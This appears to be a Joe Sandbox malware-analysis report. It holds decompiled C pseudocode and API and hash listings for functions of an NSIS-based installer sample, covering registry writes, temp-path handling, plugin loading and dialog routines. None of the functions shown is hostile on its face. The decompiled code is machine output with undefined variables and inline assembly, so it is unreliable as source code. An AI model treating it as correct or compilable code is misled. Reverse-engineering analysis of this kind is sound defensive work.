                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                        • String ID:
                        • API String ID: 2584051700-0
                        • Opcode ID: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
                        • Instruction ID: 0d45dbb9e622ade016cb62109ac663f1c9afcfae21dbc147df73c93619ae97e2
                        • Opcode Fuzzy Hash: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
                        • Instruction Fuzzy Hash: 6401D871940641EFEB006BB4AE89BDA3FB0AF15301F10493AF141B61D2C6B90404DB2C
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 59%
                        			E00401C43(intOrPtr __edx) {
                        				int _t29;
                        				long _t30;
                        				signed int _t32;
                        				WCHAR* _t35;
                        				long _t36;
                        				int _t41;
                        				signed int _t42;
                        				int _t46;
                        				int _t56;
                        				intOrPtr _t57;
                        				struct HWND__* _t63;
                        				void* _t64;
                        
                        				_t57 = __edx;
                        				_t29 = E00402D84(3);
                        				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                        				 *(_t64 - 0x18) = _t29;
                        				_t30 = E00402D84(4);
                        				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                        				 *(_t64 + 8) = _t30;
                        				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                        					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                        				}
                        				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                        				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                        					 *(_t64 + 8) = E00402DA6(0x44);
                        				}
                        				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                        				_push(1);
                        				if(__eflags != 0) {
                        					_t61 = E00402DA6();
                        					_t32 = E00402DA6();
                        					asm("sbb ecx, ecx");
                        					asm("sbb eax, eax");
                        					_t35 =  ~( *_t31) & _t61;
                        					__eflags = _t35;
                        					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
                        					goto L10;
                        				} else {
                        					_t63 = E00402D84();
                        					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                        					_t41 = E00402D84(2);
                        					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                        					_t56 =  *(_t64 - 0x1c) >> 2;
                        					if(__eflags == 0) {
                        						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                        						L10:
                        						 *(_t64 - 0x38) = _t36;
                        					} else {
                        						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                        						asm("sbb eax, eax");
                        						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                        					}
                        				}
                        				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                        				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                        					_push( *(_t64 - 0x38));
                        					E00406461();
                        				}
                        				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t64 - 4));
                        				return 0;
                        			}
















                        APIs
                        • SendMessageTimeoutW.USER32 ref: 00401CB3
                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: MessageSend$Timeout
                        • String ID: !
                        • API String ID: 1777923405-2657877971
                        • Opcode ID: 443c3db962ab0709f794cef0dd75cfbbc40298e4b9bc43596e0072424d6b1197
                        • Instruction ID: f7a68e929e996113dc281fa05a4685e5ce16b579df1de56e4cd617e501a9a943
                        • Opcode Fuzzy Hash: 443c3db962ab0709f794cef0dd75cfbbc40298e4b9bc43596e0072424d6b1197
                        • Instruction Fuzzy Hash: 90219C7190421AEFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E00404D23(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                        				char _v68;
                        				char _v132;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed int _t23;
                        				signed int _t24;
                        				void* _t31;
                        				void* _t33;
                        				void* _t34;
                        				void* _t44;
                        				signed int _t46;
                        				signed int _t50;
                        				signed int _t52;
                        				signed int _t53;
                        				signed int _t55;
                        
                        				_t23 = _a16;
                        				_t53 = _a12;
                        				_t44 = 0xffffffdc;
                        				if(_t23 == 0) {
                        					_push(0x14);
                        					_pop(0);
                        					_t24 = _t53;
                        					if(_t53 < 0x100000) {
                        						_push(0xa);
                        						_pop(0);
                        						_t44 = 0xffffffdd;
                        					}
                        					if(_t53 < 0x400) {
                        						_t44 = 0xffffffde;
                        					}
                        					if(_t53 < 0xffff3333) {
                        						_t52 = 0x14;
                        						asm("cdq");
                        						_t24 = 1 / _t52 + _t53;
                        					}
                        					_t25 = _t24 & 0x00ffffff;
                        					_t55 = _t24 >> 0;
                        					_t46 = 0xa;
                        					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                        				} else {
                        					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                        					_t50 = 0;
                        				}
                        				_t31 = E00406557(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                        				_t33 = E00406557(_t44, _t50, _t55,  &_v132, _t44);
                        				_t34 = E00406557(_t44, _t50, 0x7a1f48, 0x7a1f48, _a8);
                        				wsprintfW(_t34 + lstrlenW(0x7a1f48) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                        				return SetDlgItemTextW( *0x7a7a38, _a4, 0x7a1f48);
                        			}




















                        APIs
                        • lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DC4
                        • wsprintfW.USER32 ref: 00404DCD
                        • SetDlgItemTextW.USER32 ref: 00404DE0
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: ItemTextlstrlenwsprintf
                        • String ID: %u.%u%s%s
                        • API String ID: 3540041739-3551169577
                        • Opcode ID: 1bfcb38a10210d596bf4d505370845bd3ec1d918e724b2dddb7cd3055ac07146
                        • Instruction ID: 68f5f2c35a4a9d0707adcc228443cff0cbca91619b9e39d4db13cc85b0838dbb
                        • Opcode Fuzzy Hash: 1bfcb38a10210d596bf4d505370845bd3ec1d918e724b2dddb7cd3055ac07146
                        • Instruction Fuzzy Hash: C911A5736041283BDB1065ADAC45EAE329C9F86334F250237FA66F71D5EA79981182E8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 83%
                        			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
                        				void* _t20;
                        				void* _t21;
                        				int _t24;
                        				int _t30;
                        				intOrPtr _t33;
                        				void* _t34;
                        				intOrPtr _t37;
                        				void* _t39;
                        				void* _t42;
                        
                        				_t42 = __eflags;
                        				_t33 = __edx;
                        				_t30 = __ebx;
                        				_t37 =  *((intOrPtr*)(_t39 - 0x20));
                        				_t34 = __eax;
                        				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
                        				 *(_t39 - 0x44) = E00402DA6(2);
                        				_t20 = E00402DA6(0x11);
                        				 *(_t39 - 4) = 1;
                        				_t21 = E00402E36(_t42, _t34, _t20, 2);
                        				 *(_t39 + 8) = _t21;
                        				if(_t21 != __ebx) {
                        					_t24 = 0;
                        					if(_t37 == 1) {
                        						E00402DA6(0x23);
                        						_t24 = lstrlenW(0x40b5c8) + _t29 + 2;
                        					}
                        					if(_t37 == 4) {
                        						 *0x40b5c8 = E00402D84(3);
                        						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
                        						_t24 = _t37;
                        					}
                        					if(_t37 == 3) {
                        						_t24 = E004032B4( *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5c8, 0x1800);
                        					}
                        					if(RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5c8, _t24) == 0) {
                        						 *(_t39 - 4) = _t30;
                        					}
                        					_push( *(_t39 + 8));
                        					RegCloseKey();
                        				}
                        				 *0x7a8ae8 =  *0x7a8ae8 +  *(_t39 - 4);
                        				return 0;
                        			}













                        APIs
                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,00000023,00000011,00000002), ref: 004024D5
                        • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,00000000,00000011,00000002), ref: 00402515
                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,00000000,00000011,00000002), ref: 004025FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: CloseValuelstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp
                        • API String ID: 2655323295-326868885
                        • Opcode ID: 12168f80e921b5cc7eda85fa60d779498084ba5053d7a6b6976cb8c5581d4f01
                        • Instruction ID: 3228b6dbd083cda5ecf055ca6763daeb969d91bf2f3b8010d8844d1cd476a235
                        • Opcode Fuzzy Hash: 12168f80e921b5cc7eda85fa60d779498084ba5053d7a6b6976cb8c5581d4f01
                        • Instruction Fuzzy Hash: CF117C71E00118BEEB11AFA5DE49EAEBAB8FF44758F11443BF504B61C1D7B88D409A68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 53%
                        			E00405EF1(void* __eflags, intOrPtr _a4) {
                        				int _t11;
                        				signed char* _t12;
                        				intOrPtr _t18;
                        				intOrPtr* _t21;
                        				signed int _t23;
                        
                        				E0040651A(0x7a4750, _a4);
                        				_t21 = E00405E94(0x7a4750);
                        				if(_t21 != 0) {
                        					E004067A1(_t21);
                        					if(( *0x7a8a78 & 0x00000080) == 0) {
                        						L5:
                        						_t23 = _t21 - 0x7a4750 >> 1;
                        						while(1) {
                        							_t11 = lstrlenW(0x7a4750);
                        							_push(0x7a4750);
                        							if(_t11 <= _t23) {
                        								break;
                        							}
                        							_t12 = E00406850();
                        							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                        								E00405E35(0x7a4750);
                        								continue;
                        							} else {
                        								goto L1;
                        							}
                        						}
                        						E00405DE9();
                        						return 0 | GetFileAttributesW(??) != 0xffffffff;
                        					}
                        					_t18 =  *_t21;
                        					if(_t18 == 0 || _t18 == 0x5c) {
                        						goto L1;
                        					} else {
                        						goto L5;
                        					}
                        				}
                        				L1:
                        				return 0;
                        			}

                        APIs
                          • Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527
                          • Part of subcall function 00405E94: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,?,00405F08,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EA2
                          • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
                          • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF
                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F4A
                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\), ref: 00405F5A
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp
                        • API String ID: 3248276644-3906918278
                        • Opcode ID: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
                        • Instruction ID: 6b34473ccab7fedc8ccd770ab5d77ed9e65f07289ecf91379f8b64e60d69f16d
                        • Opcode Fuzzy Hash: 6050a9c972c7e617ff80ad1598d6c44632e97a304d800cac2a50d0185b8cc685
                        • Instruction Fuzzy Hash: 64F0F43A105D5325D622333A5C09AAF1609CEC2328B19093FF992B22D1DB3CCA438D6E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00405E94(WCHAR* _a4) {
                        				WCHAR* _t5;
                        				short* _t7;
                        				WCHAR* _t10;
                        				short _t11;
                        				WCHAR* _t12;
                        				void* _t14;
                        
                        				_t12 = _a4;
                        				_t10 = CharNextW(_t12);
                        				_t5 = CharNextW(_t10);
                        				_t11 =  *_t12;
                        				if(_t11 == 0 ||  *_t10 != 0x3a || _t10[1] != 0x5c) {
                        					if(_t11 != 0x5c || _t12[1] != _t11) {
                        						L10:
                        						return 0;
                        					} else {
                        						_t14 = 2;
                        						while(1) {
                        							_t14 = _t14 - 1;
                        							_t7 = E00405E16(_t5, 0x5c);
                        							if( *_t7 == 0) {
                        								goto L10;
                        							}
                        							_t5 = _t7 + 2;
                        							if(_t14 != 0) {
                        								continue;
                        							}
                        							return _t5;
                        						}
                        						goto L10;
                        					}
                        				} else {
                        					return CharNextW(_t5);
                        				}
                        			}

                        APIs
                        • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,?,00405F08,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EA2
                        • CharNextW.USER32(00000000), ref: 00405EA7
                        • CharNextW.USER32(00000000), ref: 00405EBF
                        Strings
                        • C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp, xrefs: 00405E95
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: CharNext
                        • String ID: C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp
                        • API String ID: 3213498283-326868885
                        • Opcode ID: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                        • Instruction ID: c1792dff9018e3c7d7ac3158fe05bd311bc395bc4b40032904b556d4a70b82f0
                        • Opcode Fuzzy Hash: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                        • Instruction Fuzzy Hash: 83F09031920F1195DB31B754CC55E7766BCEB98765B00843BE681B72C1D3B88A828AEA
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 58%
                        			E00405DE9(WCHAR* _a4) {
                        				WCHAR* _t9;
                        
                        				_t9 = _a4;
                        				_push( &(_t9[lstrlenW(_t9)]));
                        				_push(_t9);
                        				if( *(CharPrevW()) != 0x5c) {
                        					lstrcatW(_t9, 0x40a014);
                        				}
                        				return _t9;
                        			}

                        APIs
                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405DEF
                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405DF9
                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405E0B
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE9
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: CharPrevlstrcatlstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\
                        • API String ID: 2659869361-3936084776
                        • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                        • Instruction ID: 5df85f57ea55352fd9405ca64aeca33b709f52697b2ce94ac79c97851b919939
                        • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                        • Instruction Fuzzy Hash: 0BD05E31111A307BC1116B48AD04DDB629CAE85700381042AF141B20A5D778596286FD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E732D10E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                        				void* _v0;
                        				void* _t27;
                        				signed int _t29;
                        				void* _t30;
                        				void* _t34;
                        				void* _t36;
                        				void* _t38;
                        				void* _t40;
                        				void* _t48;
                        				void* _t54;
                        				void* _t63;
                        				void* _t64;
                        				signed int _t66;
                        				void* _t67;
                        				void* _t73;
                        				void* _t74;
                        				void* _t77;
                        				void* _t80;
                        				void _t81;
                        				void _t82;
                        				intOrPtr _t84;
                        				void* _t86;
                        				void* _t88;
                        
                        				 *0x732d506c = _a8;
                        				 *0x732d5070 = _a16;
                        				 *0x732d5074 = _a12;
                        				_a12( *0x732d5048, E732D1651, _t73);
                        				_t66 =  *0x732d506c +  *0x732d506c * 4 << 3;
                        				_t27 = E732D12E3();
                        				_v0 = _t27;
                        				_t74 = _t27;
                        				if( *_t27 == 0) {
                        					L28:
                        					return GlobalFree(_t27);
                        				}
                        				do {
                        					_t29 =  *_t74 & 0x0000ffff;
                        					_t67 = 2;
                        					_t74 = _t74 + _t67;
                        					_t88 = _t29 - 0x66;
                        					if(_t88 > 0) {
                        						_t30 = _t29 - 0x6c;
                        						if(_t30 == 0) {
                        							L23:
                        							_t31 =  *0x732d5040;
                        							if( *0x732d5040 == 0) {
                        								goto L26;
                        							}
                        							E732D1603( *0x732d5074, _t31 + 4, _t66);
                        							_t34 =  *0x732d5040;
                        							_t86 = _t86 + 0xc;
                        							 *0x732d5040 =  *_t34;
                        							L25:
                        							GlobalFree(_t34);
                        							goto L26;
                        						}
                        						_t36 = _t30 - 4;
                        						if(_t36 == 0) {
                        							L13:
                        							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                        							_t74 = _t74 + _t67;
                        							_t34 = E732D1312(E732D135A(_t38));
                        							L14:
                        							goto L25;
                        						}
                        						_t40 = _t36 - _t67;
                        						if(_t40 == 0) {
                        							L11:
                        							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                        							_t74 = _t74 + _t67;
                        							_t34 = E732D1381(_t80, E732D12E3());
                        							goto L14;
                        						}
                        						L8:
                        						if(_t40 == 1) {
                        							_t81 = GlobalAlloc(0x40, _t66 + 4);
                        							_t10 = _t81 + 4; // 0x4
                        							E732D1603(_t10,  *0x732d5074, _t66);
                        							_t86 = _t86 + 0xc;
                        							 *_t81 =  *0x732d5040;
                        							 *0x732d5040 = _t81;
                        						}
                        						goto L26;
                        					}
                        					if(_t88 == 0) {
                        						_t48 =  *0x732d5070;
                        						_t77 =  *_t48;
                        						 *_t48 =  *_t77;
                        						_t49 = _v0;
                        						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                        						if( *((short*)(_t77 + 4)) == 0x2691) {
                        							E732D1603(_t49, _t77 + 8, 0x38);
                        							_t86 = _t86 + 0xc;
                        						}
                        						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                        						GlobalFree(_t77);
                        						goto L26;
                        					}
                        					_t54 = _t29 - 0x46;
                        					if(_t54 == 0) {
                        						_t82 = GlobalAlloc(0x40,  *0x732d506c +  *0x732d506c + 8);
                        						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                        						_t14 = _t82 + 8; // 0x8
                        						E732D1603(_t14, _v0, 0x38);
                        						_t86 = _t86 + 0xc;
                        						 *_t82 =  *( *0x732d5070);
                        						 *( *0x732d5070) = _t82;
                        						goto L26;
                        					}
                        					_t63 = _t54 - 6;
                        					if(_t63 == 0) {
                        						goto L23;
                        					}
                        					_t64 = _t63 - 4;
                        					if(_t64 == 0) {
                        						 *_t74 =  *_t74 + 0xa;
                        						goto L13;
                        					}
                        					_t40 = _t64 - _t67;
                        					if(_t40 == 0) {
                        						 *_t74 =  *_t74 + 0xa;
                        						goto L11;
                        					}
                        					goto L8;
                        					L26:
                        				} while ( *_t74 != 0);
                        				_t27 = _v0;
                        				goto L28;
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.886480223.00000000732D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 732D0000, based on PE: true
                        • Associated: 00000001.00000002.886476119.00000000732D0000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886488080.00000000732D4000.00000002.00000001.01000000.00000006.sdmp
                        • Associated: 00000001.00000002.886506522.00000000732D6000.00000002.00000001.01000000.00000006.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_732d0000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Global$Free$Alloc
                        • String ID:
                        • API String ID: 1780285237-0
                        • Opcode ID: 51004ebed27153d04282694fcf52b6b17c71a15aff33725f6956b0b8f98487d4
                        • Instruction ID: e3ff651e2166d3cb24df631df3c397d82184fe7a002078dc9789455898fd5784
                        • Opcode Fuzzy Hash: 51004ebed27153d04282694fcf52b6b17c71a15aff33725f6956b0b8f98487d4
                        • Instruction Fuzzy Hash: FD51C0B6A20212DFE780DF79D848B1577F8FB08702B248115E90ADBA90E7B5F990DB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 92%
                        			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                        				signed int _t14;
                        				int _t17;
                        				void* _t24;
                        				intOrPtr* _t29;
                        				void* _t31;
                        				signed int _t32;
                        				void* _t35;
                        				void* _t40;
                        				signed int _t42;
                        
                        				_t29 = __edi;
                        				_t24 = __ebx;
                        				_t14 =  *(_t35 - 0x28);
                        				_t40 = __edx - 0x38;
                        				 *(_t35 - 0x10) = _t14;
                        				_t27 = 0 | _t40 == 0x00000000;
                        				_t32 = _t40 == 0;
                        				if(_t14 == __ebx) {
                        					if(__edx != 0x38) {
                        						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                        					} else {
                        						E00402DA6(0x21);
                        						E0040653C("C:\Users\engineer\AppData\Local\Temp\nsc4B5D.tmp", "C:\Users\engineer\AppData\Local\Temp\nsc4B5D.tmp\System.dll", 0x400);
                        						_t17 = lstrlenA("C:\Users\engineer\AppData\Local\Temp\nsc4B5D.tmp\System.dll");
                        					}
                        				} else {
                        					E00402D84(1);
                        					 *0x40adc8 = __ax;
                        					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                        				}
                        				 *(_t35 + 8) = _t17;
                        				if( *_t29 == _t24) {
                        					L13:
                        					 *((intOrPtr*)(_t35 - 4)) = 1;
                        				} else {
                        					_t31 = E0040647A(_t27, _t29);
                        					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E004060EB(_t31, _t31) >= 0) {
                        						_t14 = E004060BC(_t31, "C:\Users\engineer\AppData\Local\Temp\nsc4B5D.tmp\System.dll",  *(_t35 + 8));
                        						_t42 = _t14;
                        						if(_t42 == 0) {
                        							goto L13;
                        						}
                        					} else {
                        						goto L13;
                        					}
                        				}
                        				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t35 - 4));
                        				return 0;
                        			}













                        APIs
                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp\System.dll), ref: 00402695
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmp
                        • Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: lstrlen
                        • String ID: C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp$C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp\System.dll
                        • API String ID: 1659193697-2733243549
                        • Opcode ID: c1098a406b4845835c503be20dede65254d091413bbf81b42510f1366076b5de
                        • Instruction ID: fdcd3470e26f59c64840f8c249bec33fde4ddddd182ca34a55142dcc3fd3dd5a
                        • Opcode Fuzzy Hash: c1098a406b4845835c503be20dede65254d091413bbf81b42510f1366076b5de
                        • Instruction Fuzzy Hash: 6211E772A10315FACB10BBB19F4AE9E7670AF40748F21443FE002B21C1D6FD8891565E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00403019(intOrPtr _a4) {
                        				long _t2;
                        				struct HWND__* _t3;
                        				struct HWND__* _t6;
                        
                        				if(_a4 == 0) {
                        					__eflags =  *0x79f700; // 0x0
                        					if(__eflags == 0) {
                        						_t2 = GetTickCount();
                        						__eflags = _t2 -  *0x7a8a6c;
                        						if(_t2 >  *0x7a8a6c) {
                        							_t3 = CreateDialogParamW( *0x7a8a60, 0x6f, 0, E00402F93, 0);
                        							 *0x79f700 = _t3;
                        							return ShowWindow(_t3, 5);
                        						}
                        						return _t2;
                        					} else {
                        						return E00406923(0);
                        					}
                        				} else {
                        					_t6 =  *0x79f700; // 0x0
                        					if(_t6 != 0) {
                        						_t6 = DestroyWindow(_t6);
                        					}
                        					 *0x79f700 = 0;
                        					return _t6;
                        				}
                        			}







                        APIs
                        • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040385A,?), ref: 0040302C
                        • GetTickCount.KERNEL32 ref: 0040304A
                        • CreateDialogParamW.USER32 ref: 00403067
                        • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040385A,?), ref: 00403075
                        Memory Dump Source
                        • Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                        Similarity
                        • API ID: Window$CountCreateDestroyDialogParamShowTick
